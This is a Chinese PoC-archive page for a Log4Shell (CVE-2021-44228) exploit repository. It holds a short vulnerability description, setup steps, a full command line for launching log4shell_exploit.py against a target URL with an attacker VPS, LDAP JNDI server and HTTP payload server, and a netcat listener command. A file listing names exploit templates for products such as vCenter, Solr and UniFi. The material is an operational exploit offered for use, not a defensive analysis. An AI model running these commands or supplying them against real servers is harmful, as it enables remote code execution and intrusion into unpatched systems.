POC详情: 925cbcd0462e7eb01121f5193de154b87779ea23

来源
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
exploit CVE-2021-44228 
介绍
# CVE-2021-44228-POC<br>
exploit CVE-2021-44228 <br>

<br>
download nuclei 
sudo cp nuclei /usr/bin/nuclei<br>
sudo chmod +x /usr/bin/nuclei<br>
git clone https://github.com/sec13b/CVE-2021-44228-POC.git<br>
mv CVE-2021-44228-POC log4shell_exploit<br>
<br>
mkdir yaml
<br>
mv *.yaml yaml/
<br><br>
<br>
run:<br>

python3 log4shell_exploit.py http://ip_to_exploit --nuclei_path /usr/bin/nuclei  /home/ubuntu/log4shell_exploit/yaml/CVE-2021-44228.yaml -i Your_VPS_IP --ldap_jar_path /home/ubuntu/log4shell_exploit/jndi_server.jar  --ldap_port 13012 --http_server_path /home/ubuntu/log4shell_exploit/http_server.py  --http_port 13013  -o /home/ubuntu/log4shell_exploit/output.json  --verbose<br>
<br>
<br>
nc -lvnp 13012
文件快照

[4.0K] /data/pocs/925cbcd0462e7eb01121f5193de154b87779ea23 ├── [ 817] CVE-2021-44228-apache-druid-exploit.yaml ├── [ 801] CVE-2021-44228-apache-jspwiki-exploit.yaml ├── [ 895] CVE-2021-44228-cas-exploit.yaml ├── [ 574] CVE-2021-44228-code42-exploit.yaml ├── [ 759] CVE-2021-44228-elasticsearch-exploit.yaml ├── [3.2K] CVE-2021-44228-headers-exploit.yaml ├── [1.2K] CVE-2021-44228-headers-small-exploit.yaml ├── [ 491] CVE-2021-44228-jamf-exploit.yaml ├── [1.1K] CVE-2021-44228-mobileiron-exploit.yaml ├── [ 360] CVE-2021-44228-ofbiz-exploit.yaml ├── [ 922] CVE-2021-44228-openfire-exploit.yaml ├── [ 433] CVE-2021-44228-opennms-exploit.yaml ├── [ 785] CVE-2021-44228-path-exploit.yaml ├── [ 917] CVE-2021-44228-query-param-exploit.yaml ├── [ 607] CVE-2021-44228-solr-exploit.yaml ├── [ 877] CVE-2021-44228-struts2-showcase-exploit.yaml ├── [ 986] CVE-2021-44228-unifi-exploit.yaml ├── [1.1K] CVE-2021-44228-vcenter-exploit.yaml ├── [ 713] CVE-2021-44228-vmware-horizon-exploit.yaml ├── [ 842] CVE-2021-44228-vmware-site-recovery-exploit.yaml ├── [ 810] CVE-2021-44228-vrealize-exploit.yaml ├── [ 489] CVE-2021-44228-webmethods-exploit.yaml ├── [4.1K] http_server.py ├── [ 16M] jndi_server.jar ├── [8.7K] log4shell_exploit.py ├── [2.3K] proc_util.py └── [ 718] README.md 0 directories, 27 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。